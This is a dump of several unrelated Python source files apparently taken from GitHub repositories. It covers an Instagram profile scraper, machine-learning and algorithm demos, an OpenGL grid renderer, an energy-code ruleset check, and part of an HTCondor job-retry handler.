'sec-ch-ua': '"Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'x-asbd-id': '198387',
'x-csrftoken': 'VUm8uVUz0h2Y2CO1SwGgVAG3jQixNBmg',
'x-ig-app-id': '936619743392459',
'x-ig-www-claim': '0',
'x-requested-with': 'XMLHttpRequest',
}
@staticmethod
def make_request(url, params, headers, proxy=None):
response = None
if proxy:
proxy_dict = {
'http': f'http://{proxy}',
'https': f'http://{proxy}'
}
response = requests.get(
url, headers=headers, params=params, proxies=proxy_dict)
else:
response = requests.get(
url, headers=headers, params=params)
return response
@staticmethod
def scrap_profile(username, proxy = None):
try:
headers = Instagram.build_headers(username)
params = Instagram.build_param(username)
response = Instagram.make_request('https://www.instagram.com/api/v1/users/web_profile_info/',
headers=headers, params=params, proxy=proxy)
if response.status_code == 200:
profile_data = response.json()['data']['user']
return json.dumps(profile_data)
else:
print('Error : ', response.status_code, response.text)
except Exception as ex:
print(ex)
def main(username):
d = Instagram.scrap_profile(username)
if d is None:
return
data = json.loads(d)
print(d)
# print(type(Instagram.scrap_tagged(args.username, args.proxy)))
# data1 = json.loads(Instagram.scrap_tagged(args.username, args.proxy))
# print(data1)
# # print(type(data))
cleaned_json_data = clean_non_utf8_chars(data)
a = cleaned_json_data["edge_owner_to_timeline_media"]["edges"]
str_data = ""
for i in range(len(a)):
b = a[i]
c = b["node"]["edge_media_to_caption"]["edges"]
for j in range(len(c)):
d = c[j]
e = d["node"]["text"]
# print(e)
str_data += e
return str_data
# file_path = "tech_data.txt"
# with open(file_path, "w") as file:
# # file.write("\nSTART\n")
# file.write(args.username)
# file.write("\n")
# file.write(str_data)
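
# Example invocation sketch (the account handle is illustrative; only public
# profiles can be scraped, and unauthenticated calls may be rate-limited):
# if __name__ == "__main__":
#     captions = main("instagram")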
| muktachanda/Social-Media-Personality-Analysis | app/src/main/python/python/insta_scrape.py | insta_scrape.py | py | 4,298 | python | en | code | 0 | github-code | 13 |
74595784016 | from .base_model import BaseVideoPredictionModel
from .base_model import VideoPredictionModel
from .savp_model import SAVPVideoPredictionModel
from .sv2p_model import SV2PVideoPredictionModel
def get_model_class(model):
model_mappings = {
'savp': 'SAVPVideoPredictionModel',
'savp_vae': 'SAVPVideoPredictionModel',
'savp_gan': 'SAVPVideoPredictionModel',
'sv2p': 'SV2PVideoPredictionModel'
}
model_class = model_mappings.get(model, model)
model_class = globals().get(model_class)
if model_class is None or not issubclass(model_class, BaseVideoPredictionModel):
raise ValueError('Invalid model %s' % model)
return model_class
| m-serra/action-inference-for-video-prediction-benchmarking | video_prediction/savp/models/__init__.py | __init__.py | py | 701 | python | en | code | 13 | github-code | 13 |
4723952074 | from math import log
# Compute the Shannon entropy of the given dataset
def calcShannonEnt(dataSet):
    # number of rows in the dataset
    numEntries = len(dataSet)
    # dictionary counting how often each label occurs
    labelCounts = {}
    # tally the label of every feature vector
    for featVec in dataSet:
        # the label is the last element
        currentLabel = featVec[-1]
        # add the label to the dictionary if it is not there yet
        if currentLabel not in labelCounts.keys():
            labelCounts[currentLabel] = 0
        labelCounts[currentLabel] += 1
    # Shannon entropy
    shannonEnt = 0.0
    # accumulate the entropy
    for key in labelCounts:
        # probability of this label
        prob = float(labelCounts[key]) / numEntries
        # apply the entropy formula
        shannonEnt -= prob * log(prob, 2)
    return shannonEnt
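
# Entropy reference (informal): H(D) = -sum_k p_k * log2(p_k), where p_k is
# the fraction of samples with label k; the information gain computed below
# is g(D, A) = H(D) - H(D | A).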
def createDataSet():  # toy loan-approval dataset
    dataSet = [[0,0,0,0,'no'],[0,0,0,1,'no'],[0,1,0,1,'yes'],[0,1,1,0,'yes'],[0,0,0,0,'no'],
               [1,0,0,0,'no'],[1,0,0,1,'no'],[1,1,1,1,'yes'],[1,0,1,2,'yes'],[1,0,1,2,'yes'],
               [2,0,1,2,'yes'],[2,0,1,1,'yes'],[2,1,0,1,'yes'],[2,1,0,2,'yes'],[2,0,0,0,'no']]
    labels = ['age', 'has job', 'owns house', 'credit rating']  # feature names
    return dataSet, labels
    # returns the dataset and the feature names
# Split the dataset on the given feature value
def splitDataSet(dataSet, axis, value):
    # dataSet - dataset to split
    # axis    - index of the feature to split on
    # value   - feature value to keep
    retDataSet = []  # list holding the resulting subset
    for featVec in dataSet:  # walk through the dataset
        if featVec[axis] == value:
            reducedFeatVec = featVec[:axis]  # drop the axis feature
            reducedFeatVec.extend(featVec[axis+1:])  # keep the remaining features
            retDataSet.append(reducedFeatVec)  # collect matching rows
    return retDataSet  # return the subset
# Choose the best feature to split on (maximum information gain)
def chooseBestFeatureToSplit(dataSet):
    numFeatures = len(dataSet[0]) - 1  # number of features
    baseEntropy = calcShannonEnt(dataSet)  # entropy of the full dataset
    bestInfoGain = 0.0  # best information gain so far
    bestFeature = -1  # index of the best feature
    for i in range(numFeatures):  # iterate over all features
        # collect the i-th feature value of every sample in dataSet
        featList = [example[i] for example in dataSet]
        uniqueVals = set(featList)  # set of unique feature values
        newEntropy = 0.0  # conditional entropy
        for value in uniqueVals:  # compute the information gain
            subDataSet = splitDataSet(dataSet, i, value)  # subset after the split
            prob = len(subDataSet) / float(len(dataSet))  # probability of the subset
            newEntropy += prob * calcShannonEnt(subDataSet)  # weighted conditional entropy
        infoGain = baseEntropy - newEntropy  # information gain
        print("information gain of feature %d: %.3f" % (i, infoGain))  # print each feature's gain
        if (infoGain > bestInfoGain):
            bestInfoGain = infoGain  # keep the largest information gain
            bestFeature = i  # remember its feature index
    return bestFeature  # index of the feature with the largest information gain
if __name__ == '__main__':
    dataSet, features = createDataSet()
    print("index of the best feature: " + str(chooseBestFeatureToSplit(dataSet))) | JiweiMma/Decision-Tree | Decisiontree-2.py | Decisiontree-2.py | py | 3,793 | python | zh | code | 0 | github-code | 13 |
21580909805 | from ..GLGraphicsItem import GLGraphicsItem
from ..transform3d import Matrix4x4, Quaternion, Vector3
from .shader import Shader
from .BufferObject import VAO, VBO
import numpy as np
import OpenGL.GL as gl
__all__ = ['GLGridItem']
def make_grid_data(size, spacing):
x, y = size
dx, dy = spacing
xvals = np.arange(-x/2., x/2. + dx*0.001, dx, dtype=np.float32)
yvals = np.arange(-y/2., y/2. + dy*0.001, dy, dtype=np.float32)
xlines = np.stack(
np.meshgrid(xvals, [yvals[0], yvals[-1]], indexing='ij'),
axis=2
).reshape(-1, 2)
ylines = np.stack(
np.meshgrid([xvals[0], xvals[-1]], yvals, indexing='xy'),
axis=2
).reshape(-1, 2)
data = np.concatenate([xlines, ylines], axis=0)
data = np.pad(data, ((0, 0), (0, 1)), mode='constant', constant_values=0.0)
return data
class GLGridItem(GLGraphicsItem):
"""
Displays xy plane.
"""
def __init__(
self,
size = (1., 1.),
spacing = (1.,1.),
color = (1.,1.,1.,0.4),
lineWidth = 1,
antialias = True,
glOptions = 'translucent',
parentItem = None
):
super().__init__(parentItem=parentItem)
self.__size = size
self.__color = np.array(color, dtype=np.float32).clip(0, 1)
self.__lineWidth = lineWidth
self.antialias = antialias
self.setGLOptions(glOptions)
self.line_vertices = make_grid_data(self.__size, spacing)
x, y = size
self.plane_vertices = np.array([
-x/2., -y/2., 0,
-x/2., y/2., 0,
x/2., -y/2., 0,
x/2., y/2., 0,
], dtype=np.float32)
self.rotate(90, 1, 0, 0)
self.setDepthValue(-1)
def initializeGL(self):
self.shader = Shader(vertex_shader, fragment_shader)
self.vao = VAO()
self.vbo1 = VBO(
data = [self.line_vertices, self.plane_vertices],
size = [3, 3],
)
def paint(self, model_matrix=Matrix4x4()):
self.setupGLState()
if self.antialias:
gl.glEnable(gl.GL_LINE_SMOOTH)
gl.glHint(gl.GL_LINE_SMOOTH_HINT, gl.GL_NICEST)
gl.glLineWidth(self.__lineWidth)
self.shader.set_uniform("view", self.proj_view_matrix().glData, "mat4")
self.shader.set_uniform("model", model_matrix.glData, "mat4")
with self.shader:
self.vao.bind()
self.shader.set_uniform("objColor1", self.__color, "vec4")
self.vbo1.setAttrPointer(1, attr_id=0)
gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, 4)
gl.glDisable(gl.GL_BLEND)
gl.glDisable(gl.GL_DEPTH_TEST)
self.shader.set_uniform("objColor1", Vector3([0, 0, 0, 1]), "vec4")
self.vbo1.setAttrPointer(0, attr_id=0)
gl.glDrawArrays(gl.GL_LINES, 0, len(self.line_vertices))
gl.glEnable(gl.GL_DEPTH_TEST)
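
# Usage sketch (the viewer setup is assumed and not part of this module):
# grid = GLGridItem(size=(10., 10.), spacing=(1., 1.))
# view.addItem(grid)  # 'view' is the package's GL view widget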
vertex_shader = """
#version 330 core
uniform mat4 model;
uniform mat4 view;
layout (location = 0) in vec3 iPos;
void main() {
gl_Position = view * model * vec4(iPos, 1.0);
}
"""
fragment_shader = """
#version 330 core
out vec4 FragColor;
uniform vec4 objColor1;
void main() {
FragColor = objColor1;
}
""" | Liuyvjin/pyqtOpenGL | pyqtOpenGL/items/GLGridItem.py | GLGridItem.py | py | 3,255 | python | en | code | 0 | github-code | 13 |
3945377298 | #!/usr/bin/env python
# encoding: utf-8
# @author: lishaogang
# @file: prog-1.py
# @time: 2020/7/5 0005 10:41
# @desc:
import matplotlib.pyplot as plt
from dDE.DE import DE
from config import test_funcs
MAXSIZE = 100
MAXDIM = 30
MAXGEN = 1500
TIMES = 1
# lbound = -1.28
# rbound = 1.28
func_id = 2
use_CD = False
use_NCD = True
# best = []
# with open('results/log.txt', 'w+') as log:
# for func_id in range(len(test_funcs)):
for i in range(TIMES):
de = DE(MAXSIZE, MAXDIM, MAXGEN, test_funcs[func_id]['func'],-test_funcs[func_id]['bound'],
test_funcs[func_id]['bound'],use_CD=use_CD, use_NCD=use_NCD)
de.update()
print("the best fitness is ", de.bestFitnessValue)
# log.write("func({})'s fitness:{}\n".format(func_id, de.bestFitnessValue))
# best.append(de.bestFitnessValue)
plt.plot(de.bestFitnessValues)
plt.xlabel("generation\n\nfunc({})'s fitness".format(func_id))
plt.ylabel('fitness')
# plt.savefig("results/func{}.jpg".format(func_id))
plt.show()
# the best fitness is 1.0579375764110492
# the best fitness is 596.6818781875263 | ShaquallLee/evolutionary-programming | dDE/prog-1.py | prog-1.py | py | 1,101 | python | en | code | 0 | github-code | 13 |
def heapAdjust(L, i, j):
    # Sift the value at index i down into the max-heap L[i..j]
    # (1-based indexing; L[0] is a placeholder).
    child = i * 2
    tmp = L[i]
    while child <= j:
        # pick the larger of the two children
        if child + 1 <= j and L[child + 1] > L[child]:
            child = child + 1
        # compare the child against tmp (the value being sifted), not L[i],
        # which may already hold a promoted child
        if L[child] > tmp:
            L[i] = L[child]
            i = child
            child = child * 2
        else:
            break
    L[i] = tmp
def heapSort(L):
    L.insert(0, 0)  # pad so the heap can use 1-based indexing
    # build the initial max-heap
    for i in range(int((len(L) - 1) / 2), 0, -1):
        heapAdjust(L, i, len(L) - 1)
    # repeatedly move the maximum to the end and re-heapify the rest
    for i in range(len(L) - 1, 0, -1):
        L[1], L[i] = L[i], L[1]
        heapAdjust(L, 1, i - 1)
    return L[1:]
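
# Quick check (illustrative):
if __name__ == "__main__":
    print(heapSort([4, 1, 3, 2, 16, 9, 10, 14, 8, 7]))
    # expected: [1, 2, 3, 4, 7, 8, 9, 10, 14, 16]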
| sangjianshun/Master-School | heapSort.py | heapSort.py | py | 541 | python | en | code | 34 | github-code | 13 |
4699855055 | '''
[문제]
omr 리스트의 값들은 이번 시험 정답이다.
a는 철수의 답안지이다. 랜덤숫자(1~5) 열 개를 a에 추가 후,
정답과 비교해서 철수의 점수를 출력.
한 문제당 10점이다.
[예시]
omr = [4, 3, 1, 5, 3, 2, 1, 4, 5, 3]
철수 = [5, 2, 5, 5, 2, 1, 4, 4, 4, 1]
성적 = 20
'''
import random
omr = [4,3,1,5,3,2,1,4,5,3]
a =[]
total=0
i=0
while i<10:
r=random.randint(1,5)
a.append(r)
if omr[i]==a[i]:
total+=10
i+=1
print(omr)
print(a)
print(total)
| Songmsu/python | H일차배열/일차배열3_문제_누적합_개수/일차배열3_문제03_omr카드_문제.py | 일차배열3_문제03_omr카드_문제.py | py | 598 | python | ko | code | 0 | github-code | 13 |
15283630460 | from django.shortcuts import render, get_object_or_404
from django.contrib.auth.decorators import login_required
from .models import Product
from .forms import RawProductForm
# Create your views here.
@login_required
def product_create_view(request):
my_form = RawProductForm()
if request.method == "POST":
my_form= RawProductForm(request.POST)
if my_form.is_valid():
print(my_form.cleaned_data)
Product.objects.create(**my_form.cleaned_data)
else:
print(my_form.errors)
context = {
"form" : my_form
}
return render(request, "products/product_create.html", context)
@login_required
def product_detail_view(request):
    product = Product.objects.get(id=1)  # demo view: always shows the product with id=1
context = {
"product": product
}
return render(request, "products/product_detail.html", context)
@login_required
def product_individual_view(request, id):
product = get_object_or_404(Product, id=id)
context = {
'product': product
}
return render(request, "products/product_detail.html", context)
@login_required
def products_list_view(request):
    products_list = Product.objects.all()  # list of objects
user = request.user.id
context= {
'products_list': products_list,
'userid': user
}
return render(request, "products/products_list.html", context)
| Leopizarro/OrderManager-Django | src/products/views.py | views.py | py | 1,380 | python | en | code | 0 | github-code | 13 |
1025446963 | import argparse
from package import MetaData
from package.log import MockLogger
def get_experiment_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f",
"--folder",
help="Folder of tasks to generate latex table for.",
required=True
)
parser.add_argument(
"-e",
"--extension", help="Metadata file extension",
default=".nlp_metadata"
)
parser.add_argument(
"-dad",
"--digits-after-decimal",
default=4,
type=int
)
parser.add_argument(
"-po",
"--prepend-output",
default="latex_dump"
)
return parser.parse_args()
def scientific(number: float) -> str:
    factors = "{:.2E}".format(number).split("E")
    sign = factors[1][0]
    factors[1] = factors[1].lstrip("+-0")
    if not factors[1]:  # the exponent was zero, e.g. "1.00E+00"
        factors[1] = "0"
    elif sign == "-":
        factors[1] = "-" + factors[1]
    return f"{factors[0]} x $10^{{{factors[1]}}}$"
if __name__ == "__main__":
args = get_experiment_args()
folder_path = args.folder
extension = args.extension
metadata_attrs = ["pearson", "pearson-p", "spearman", "spearman-p", "oov-ratio"]
folder_name = MetaData.get_folder_name(folder_path)
results_file = folder_name + extension
with MetaData(".", "txt", metadata_attrs, results_file) as _md:
md = _md._metadata
dump_file = open(f"{args.prepend_output}_{folder_name}.txt", "w", encoding="utf-8")
lines = [
r"\begin{table}[!htbp]"
r"\centering",
r"\scalebox{0.8}{",
r"\begin{tabular}{|c|cc|}",
r"\hline",
r"Similarity Task & \multicolumn{2}{c|}{Statistics} \\ \hline",
r"\multicolumn{1}{|l|}{\multirow{3}{*}{Syntactic Similarity}} & \multicolumn{1}{c|}{Pearson Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["syntactic.txt", "pearson"], scientific(md.loc["syntactic.txt", "pearson-p"])),
r"\multicolumn{1}{|l|}{} & \multicolumn{1}{c|}{Spearman Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["syntactic.txt", "spearman"], scientific(md.loc["syntactic.txt", "spearman-p"])),
r"\multicolumn{1}{|l|}{} & \multicolumn{2}{c|}{OOV Ratio: %.2f} \\ \hline" % (md.loc["syntactic.txt", "oov-ratio"]),
r"\multirow{3}{*}{Semantic Similarity} & \multicolumn{1}{c|}{Pearson Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["semantic.txt", "pearson"], scientific(md.loc["semantic.txt", "pearson-p"])),
r"& \multicolumn{1}{c|}{Spearman Result: %.2f} & p-value: %s \\ \cline{2-3} " % (md.loc["semantic.txt", "spearman"], scientific(md.loc["semantic.txt", "spearman-p"])),
r"& \multicolumn{2}{c|}{OOV Ratio: %.2f} \\ \hline" % (md.loc["semantic.txt", "oov-ratio"]),
r"\end{tabular}}",
r"\caption{\footnotesize{Placeholder}}",
r"\end{table}",
]
for line in lines:
dump_file.write(f"{line}\n") | Turkish-Word-Embeddings/Word-Embeddings-Repository-for-Turkish | evaluation/dump_similarity_latex_table.py | dump_similarity_latex_table.py | py | 3,067 | python | en | code | 1 | github-code | 13 |
29380812183 | num = int(input('Enter four-digit natural number: '))
search2 = int(input('1) Find the product of the digits of number".\n'
'2) Write the number in reverse order.\n'
'3) In ascending order, sort the numbers included in the given number"\n'
'Enter number of action you need to perform: '))
num1 = (num // 1000)
num2 = (num % 1000 // 100)
num3 = (num % 100 // 10)
num4 = (num % 10)
if search2 == 1:
print('Your answer is ', num1 * num2 * num3 * num4)
elif search2 == 2:
print('Your reverse number: ',str(num4) + str(num3) + str(num2) + str(num1))
elif search2 == 3:
list1 = [int(d) for d in str(num)]
sort = (sorted(list1))
num0 = 0
for i in sort:
num0 = num0 * 10 + i
print('Your sorted number: ',num0)
else:
print('Action is incorrect') | kolyasalubov/Lv-14.03.PythonFundamentals | dmisia/HW3/Practical_Task_2.py | Practical_Task_2.py | py | 836 | python | en | code | 0 | github-code | 13 |
36587499826 | import numpy as np
import math
class Match:
def __init__(self, data1, data2, dist):
self.data1 = data1
self.data2 = data2
self.dist = dist
class KNN:
def __init__(self, datas1, datas2, distf=lambda x, y: math.sqrt(x**2 + y**2)):
self.data1 = datas1
self.data2 = datas2
self.distf = distf
def apply(self, k=3):
matches = []
for d1 in self.data1:
sort = []
for d2 in self.data2:
dist = self.distf(d1, d2)
sort.append(Match(d1, d2, dist))
sort.sort(key=lambda x: x.dist)
matches.append(sort)
return list(map(lambda x: x[:k], matches))
| ysokmr/sift_image_merger | knn.py | knn.py | py | 702 | python | en | code | 1 | github-code | 13 |
34786229988 | from rct229.rule_engine.rule_base import RuleDefinitionBase
from rct229.rule_engine.rule_list_indexed_base import RuleDefinitionListIndexedBase
from rct229.rule_engine.user_baseline_proposed_vals import UserBaselineProposedVals
from rct229.rulesets.ashrae9012019.ruleset_functions.baseline_system_type_compare import (
baseline_system_type_compare,
)
from rct229.rulesets.ashrae9012019.ruleset_functions.baseline_systems.baseline_system_util import (
HVAC_SYS,
)
from rct229.rulesets.ashrae9012019.ruleset_functions.get_baseline_system_types import (
get_baseline_system_types,
)
from rct229.utils.pint_utils import CalcQ
from rct229.utils.std_comparisons import std_equal
APPLICABLE_SYS_TYPES = [
HVAC_SYS.SYS_5,
HVAC_SYS.SYS_6,
HVAC_SYS.SYS_7,
HVAC_SYS.SYS_8,
HVAC_SYS.SYS_11_1,
HVAC_SYS.SYS_11_2,
]
VALIDATION_POINTS_LENGTH = 11
SUPPLY_AIRFLOW_COEFFS = [0.1 * i for i in range(VALIDATION_POINTS_LENGTH)]
DESIGN_POWER_COEFFS = [0.0, 0.03, 0.07, 0.13, 0.21, 0.30, 0.41, 0.54, 0.68, 0.83, 1.0]
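# The two coefficient lists above encode the Method 1 part-load fan power
# points validated below: each index i pairs a fraction of design airflow
# (SUPPLY_AIRFLOW_COEFFS[i]) with a fraction of design fan power
# (DESIGN_POWER_COEFFS[i]).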
class Section23Rule8(RuleDefinitionListIndexedBase):
"""Rule 8 of ASHRAE 90.1-2019 Appendix G Section 23 (Air-side)"""
def __init__(self):
super(Section23Rule8, self).__init__(
rmrs_used=UserBaselineProposedVals(False, True, False),
each_rule=Section23Rule8.HVACRule(),
index_rmr="baseline",
id="23-8",
description="System 5-8 and 11 - part load VAV fan power shall be modeled using either method 1 or 2 in Table G3.1.3.15. This rule will only validate data points from Method-1 Part-load Fan Power Data. However, both methods are equivalent. When modeling inputs are based on Method 2, values should be converted to Method 1 when writing to RMD.",
ruleset_section_title="HVAC - Airside",
standard_section="Section G3.1.3.15 VAV Fan Part-Load Performance (Systems 5 through 8 and 11)",
is_primary_rule=True,
rmr_context="ruleset_model_descriptions/0",
list_path="$.buildings[*].building_segments[*].heating_ventilating_air_conditioning_systems[*]",
)
def is_applicable(self, context, data=None):
rmi_b = context.baseline
baseline_system_types_dict = get_baseline_system_types(rmi_b)
return any(
[
baseline_system_type_compare(system_type, applicable_sys_type, False)
for system_type in baseline_system_types_dict
for applicable_sys_type in APPLICABLE_SYS_TYPES
]
)
def create_data(self, context, data):
rmi_b = context.baseline
baseline_system_types_dict = get_baseline_system_types(rmi_b)
applicable_hvac_sys_ids = [
hvac_id
for sys_type in baseline_system_types_dict
for target_sys_type in APPLICABLE_SYS_TYPES
if baseline_system_type_compare(sys_type, target_sys_type, False)
for hvac_id in baseline_system_types_dict[sys_type]
]
return {"applicable_hvac_sys_ids": applicable_hvac_sys_ids}
def list_filter(self, context_item, data):
hvac_sys_b = context_item.baseline
applicable_hvac_sys_ids = data["applicable_hvac_sys_ids"]
return hvac_sys_b["id"] in applicable_hvac_sys_ids
class HVACRule(RuleDefinitionListIndexedBase):
def __init__(self):
super(Section23Rule8.HVACRule, self).__init__(
rmrs_used=UserBaselineProposedVals(False, True, False),
each_rule=Section23Rule8.HVACRule.SupplyFanRule(),
index_rmr="baseline",
list_path="$.fan_system.supply_fans[*]",
)
class SupplyFanRule(RuleDefinitionBase):
def __init__(self):
super(Section23Rule8.HVACRule.SupplyFanRule, self).__init__(
rmrs_used=UserBaselineProposedVals(False, True, False),
required_fields={
"$": [
"design_airflow",
"design_electric_power",
"output_validation_points",
],
},
)
def get_calc_vals(self, context, data=None):
supply_fan_b = context.baseline
design_airflow_b = supply_fan_b["design_airflow"]
design_electric_power_b = supply_fan_b["design_electric_power"]
output_validation_points_b = supply_fan_b["output_validation_points"]
output_validation_points = [
[output["airflow"], output["result"]]
for output in output_validation_points_b
]
target_validation_points = [
[
SUPPLY_AIRFLOW_COEFFS[idx] * design_airflow_b,
DESIGN_POWER_COEFFS[idx] * design_electric_power_b,
]
for idx in range(VALIDATION_POINTS_LENGTH)
]
return {
"design_airflow_b": CalcQ("air_flow_rate", design_airflow_b),
"design_electric_power_b": CalcQ(
"electric_power", design_electric_power_b
),
"output_validation_points": output_validation_points,
"target_validation_points": target_validation_points,
}
def rule_check(self, context, calc_vals=None, data=None):
output_validation_points = calc_vals["output_validation_points"]
target_validation_points = calc_vals["target_validation_points"]
return len(
output_validation_points
) == VALIDATION_POINTS_LENGTH and all(
[
std_equal(ovp[0], tvp[0]) and std_equal(ovp[1], tvp[1])
for ovp, tvp in zip(
output_validation_points, target_validation_points
)
]
)
| pnnl/ruleset-checking-tool | rct229/rulesets/ashrae9012019/section23/section23rule8.py | section23rule8.py | py | 6,129 | python | en | code | 6 | github-code | 13 |
# Import the requests library to send HTTP requests
# and BeautifulSoup to parse the returned HTML
import requests
from bs4 import BeautifulSoup
# Fetch and parse the web page
webpage = "https://en.wikipedia.org/wiki/Deep_learning"
Parsedpage = requests.get(webpage).text
soup = BeautifulSoup(Parsedpage,"html.parser")
# Print the title of the web page
title = soup.title
print(title)
# Finding all the links within the page containing a tag
Tag = soup.find_all("a")
for link in Tag:
print(link.get("href")) | adtmv7/CS5590-490-Python-Deep-Learning | ICP3/Source/webscraping.py | webscraping.py | py | 518 | python | en | code | 2 | github-code | 13 |
74563029458 | import os
import re
import sys
import json
import shutil
import subprocess
import socket
from collections import namedtuple
import classad
from ServerUtilities import executeCommand
from ServerUtilities import MAX_DISK_SPACE, MAX_WALLTIME, MAX_MEMORY
JOB_RETURN_CODES = namedtuple('JobReturnCodes', 'OK RECOVERABLE_ERROR FATAL_ERROR')(0, 1, 2)
# Without this environment variable set, HTCondor takes a write lock per logfile entry
os.environ['_condor_ENABLE_USERLOG_LOCKING'] = 'false'
# ==============================================================================
class FatalError(Exception):
pass
class RecoverableError(Exception):
pass
# ==============================================================================
class RetryJob():
"""
Need a doc string here.
"""
def __init__(self):
"""
Class constructor.
"""
self.logger = None
self.reqname = None
self.job_return_code = None
self.dag_retry = None
self.crab_retry = None
self.job_id = None
self.dag_jobid = None
self.dag_clusterid = None
self.site = None
self.username = None
self.ads = []
self.ad = {}
self.report = {}
self.validreport = True
self.integrated_job_time = 0
self.MAX_DISK_SPACE = MAX_DISK_SPACE
self.MAX_WALLTIME = MAX_WALLTIME
self.MAX_MEMORY = MAX_MEMORY
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def get_job_ad_from_condor_q(self):
"""
Need a doc string here.
"""
if self.dag_clusterid == -1:
return
shutil.copy("job_log", "job_log.%s" % str(self.dag_jobid))
p = subprocess.Popen(["condor_q", "-debug", "-l", "-userlog", "job_log.%s" %
str(self.dag_jobid), str(self.dag_jobid)], stdout=subprocess.PIPE, stderr=sys.stderr)
output, _ = p.communicate()
status = p.returncode
try:
os.unlink("job_log.%s" % str(self.dag_jobid))
except Exception: # pylint: disable=broad-except
pass
if status:
raise FatalError("Failed to query condor user log:\n%s" % output)
for text_ad in output.split("\n\n"):
try:
ad = classad.parseOld(text_ad)
except SyntaxError:
continue
if ad:
self.ads.append(ad)
self.ad = self.ads[-1]
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def get_job_ad_from_file(self):
"""
Need a doc string here
"""
self.ads.append(self.ad)
if self.dag_retry == 0:
msg = "This is job retry number 0. Will not try to search and load previous job ads."
self.logger.info(msg)
return
for dag_retry in range(self.dag_retry):
job_ad_file = os.path.join(".", "finished_jobs", "job.%s.%d" % (self.job_id, dag_retry))
if os.path.isfile(job_ad_file):
try:
with open(job_ad_file, encoding='utf-8') as fd:
ad = classad.parseOld(fd)
except Exception: # pylint: disable=broad-except
msg = "Unable to parse classads from file %s. Continuing." % (job_ad_file)
self.logger.warning(msg)
continue
if ad:
self.ads.append(ad)
else:
msg = "File %s does not exist. Continuing." % (job_ad_file)
self.logger.warning(msg)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def get_report(self):
"""
Need a doc string here.
"""
try:
with open("jobReport.json.%s" % (self.job_id), 'r', encoding='utf-8') as fd:
try:
self.report = json.load(fd)
except ValueError:
self.report = {}
site = self.report.get('executed_site', None)
if site:
self.site = site
except IOError:
self.validreport = False
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def record_site(self, job_status):
"""
Need a doc string here.
"""
job_status_name = None
for name, code in JOB_RETURN_CODES._asdict().items():
if code == job_status:
job_status_name = name
try:
with os.fdopen(os.open("task_statistics.%s.%s" % (self.site, job_status_name), os.O_APPEND | os.O_CREAT | os.O_RDWR, 0o644), 'a') as fd:
fd.write("%s\n" % (self.job_id))
except Exception as ex: # pylint: disable=broad-except
self.logger.error(str(ex))
# Swallow the exception - record_site is advisory only
try:
with os.fdopen(os.open("task_statistics.%s" % (job_status_name), os.O_APPEND | os.O_CREAT | os.O_RDWR, 0o644), 'a') as fd:
fd.write("%s\n" % (self.job_id))
except Exception as ex: # pylint: disable=broad-except
self.logger.error(str(ex))
# Swallow the exception - record_site is advisory only
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def create_fake_fjr(self, exitMsg, exitCode, jobExitCode=None, fatalError=True):
"""
        When a FatalError is hit no real FJR is generated, but one is needed
        for the error summary, so write a fake one. Can also be used to "fix"
        the exit code in the FJR while still allowing a resubmission, by
        passing fatalError=False.
"""
fake_fjr = {}
fake_fjr['exitMsg'] = exitMsg
if jobExitCode:
fake_fjr['jobExitCode'] = jobExitCode
fake_fjr['exitCode'] = jobExitCode
else:
fake_fjr['exitCode'] = exitCode
jobReport = "job_fjr.%s.%d.json" % (self.job_id, self.crab_retry)
if os.path.isfile(jobReport) and os.path.getsize(jobReport) > 0:
# File exists and it is not empty
msg = "%s file exists and it is not empty!" % (jobReport)
msg += " CRAB3 will overwrite it, because the job got FatalError"
self.logger.info(msg)
with open(jobReport, 'r', encoding='utf-8') as fd:
msg = "Old %s file content: %s" % (jobReport, fd.read())
self.logger.info(msg)
with open(jobReport, 'w', encoding='utf-8') as fd:
msg = "New %s file content: %s" % (jobReport, json.dumps(fake_fjr))
self.logger.info(msg)
json.dump(fake_fjr, fd)
# Fake FJR raises FatalError
if fatalError:
raise FatalError(exitMsg)
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_cpu_report(self):
"""
        Refuse to retry (via a fake fjr raising FatalError) jobs that were killed for
        exceeding wall clock or CPU limits, or whose run time, possibly integrated
        across retries, exceeds MAX_WALLTIME.
"""
# If job was killed on the worker node, we probably don't have a FJR.
if self.ad.get("RemoveReason", "").startswith("Removed due to wall clock limit"):
exitMsg = "Not retrying job due to wall clock limit (job automatically killed on the worker node)"
self.create_fake_fjr(exitMsg, 50664, 50664) # this raises FatalError
if "CPU usage over limit" in self.ad.get("RemoveReason", ""):
exitMsg = "Not retrying job due CPU limit (using more CPU than Wall Clock)"
self.create_fake_fjr(exitMsg, 50663, 50663) # this raises FatalError
subreport = self.report
for attr in ['steps', 'cmsRun', 'performance', 'cpu', 'TotalJobTime']:
subreport = subreport.get(attr, None)
if subreport is None:
return
total_job_time = self.report['steps']['cmsRun']['performance']['cpu']['TotalJobTime']
try:
total_job_time = float(total_job_time)
except ValueError:
return
integrated_job_time = 0
for ad in self.ads:
if 'RemoteWallClockTime' in ad:
integrated_job_time += ad['RemoteWallClockTime']
self.integrated_job_time = integrated_job_time
if total_job_time > self.MAX_WALLTIME:
exitMsg = "Not retrying a long running job (job ran for %d hours)" % (total_job_time / 3600)
self.create_fake_fjr(exitMsg, 50664) # this raises FatalError
if integrated_job_time > (1.5 * self.MAX_WALLTIME):
exitMsg = "Not retrying a job because the integrated time (across all retries) is %d hours." % (integrated_job_time / 3600)
self.create_fake_fjr(exitMsg, 50664) # this raises FatalError
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_memory_report(self):
"""
        Refuse to retry (via a fake fjr raising FatalError) jobs that were killed for
        excessive memory use or whose peak RSS exceeded MAX_MEMORY.
"""
# If job was killed on the worker node, we probably don't have a FJR.
